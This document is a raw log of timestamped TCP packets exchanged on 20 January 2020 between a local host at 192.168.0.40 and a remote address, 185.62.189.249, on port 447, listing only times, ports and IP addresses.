Jan 20, 2020 14:20:17.557274103 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:17.593103886 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.600577116 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.600591898 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.600914955 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:17.627264023 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:17.648658991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.859622002 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:17.872277021 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:17.872631073 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:29.859874010 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:29.919260979 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051399946 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051426888 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051448107 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051470041 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051608086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051630020 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051772118 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051805973 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.051836967 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.051837921 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.051995993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.052011013 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.052119970 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.052306890 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.071027040 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071089983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071233988 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071269989 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071353912 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.071540117 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.071549892 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071571112 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071665049 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071738005 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.071809053 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071896076 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071943998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.071969986 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.072063923 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.072077036 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072189093 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072325945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072355032 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.072468042 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072578907 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072587013 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.072707891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072827101 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072841883 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.072943926 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.073124886 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.073414087 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.078672886 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.078701973 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.078841925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.091675997 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.091878891 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.091900110 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092176914 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.092181921 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092204094 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092314959 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092338085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092344999 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.092518091 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.092533112 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092564106 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092705011 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.092761993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092891932 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.092915058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093046904 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.093089104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093242884 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093307018 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093426943 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093489885 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.093533993 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093663931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093699932 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.093792915 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093930960 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.093945980 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.093967915 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094062090 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094072104 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.094261885 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094290972 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094425917 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.094438076 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094453096 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094558001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094574928 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.094676971 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094785929 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.094841003 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.094899893 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095009089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095069885 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.095168114 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095266104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095339060 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.095379114 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095494986 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095551014 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.095585108 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.095757008 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.097836018 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.097951889 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.098056078 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.098115921 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.103971958 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.104368925 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.111793041 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.111821890 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.111872911 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.111998081 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.112106085 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112135887 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112234116 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112294912 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.112402916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112502098 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112535954 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112575054 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.112678051 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.112765074 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112788916 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112936020 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.112947941 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.113017082 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113152027 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.113162994 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113241911 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113378048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113411903 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.113511086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113631964 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113688946 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.113775015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113893032 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113925934 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.113949060 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.114097118 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114141941 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.114229918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114252090 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114355087 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114387989 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.114463091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114588022 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114655018 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.114705086 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114814043 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.114861965 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.114929914 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115113020 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.115124941 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115227938 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115258932 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.115344048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115448952 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115566015 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115663052 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115766048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115878105 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.115878105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.115992069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116148949 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116265059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116295099 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116338015 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.116349936 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.116416931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116478920 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.116544962 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116652012 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116709948 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.116769075 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116878033 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.116934061 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.116995096 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.117109060 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.117193937 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.117227077 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.117341042 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.117408037 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.117459059 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.117604017 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.124700069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.124825001 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.124840021 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.125121117 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.135740995 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.135790110 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.135812044 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.135833025 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136121988 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.136234999 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136265039 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136285067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136307955 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136363983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136480093 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.136502028 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136631966 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136759043 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136770964 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.136790991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.136962891 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.137006998 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137151003 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137250900 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137367010 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137434006 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.137496948 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137609005 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137641907 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137768984 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.137808084 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.137902021 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138070107 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138176918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138187885 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.138212919 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138325930 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.138338089 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138534069 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138550043 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.138565063 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138673067 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138726950 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.138793945 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138905048 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.138968945 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.139094114 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139203072 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139273882 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.139312983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139426947 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139480114 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.139539957 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139662027 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139714956 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.139772892 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139882088 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.139955997 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.139970064 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.140152931 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.144689083 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156186104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156375885 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156407118 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156481028 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.156584024 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.156729937 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156812906 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156837940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156866074 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.156971931 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.156995058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157037973 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.157095909 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157213926 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157376051 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157394886 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.157500982 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157567024 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.157793045 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.159290075 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.159349918 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.159482002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.159571886 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.159765005 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.159786940 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.159878969 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160007000 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160054922 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.160115004 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160267115 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160285950 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160307884 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.160475969 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160492897 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.160497904 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160625935 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160639048 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.160741091 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160851002 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.160963058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161007881 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.161070108 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161189079 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161246061 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.161293983 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161402941 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161474943 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.161533117 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161638975 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161710978 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.161756992 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161856890 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.161931038 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.161988974 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162120104 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162152052 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.162252903 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162364006 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162417889 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.162472963 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162596941 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162637949 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.162694931 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162828922 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.162873030 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.162929058 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163121939 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.163132906 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163155079 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163244963 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163280964 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.163361073 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163467884 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163538933 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.163590908 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163702011 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163755894 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.163817883 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.163996935 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.176124096 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.187838078 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.187858105 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188007116 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188026905 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188142061 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.188230038 CET	49193	447	192.168.0.40	185.62.189.249
Jan 20, 2020 14:20:30.188230991 CET	447	49193	185.62.189.249	192.168.0.40
Jan 20, 2020 14:20:30.188254118 CET	447	49193	185.62.189.249	192.168.0.40
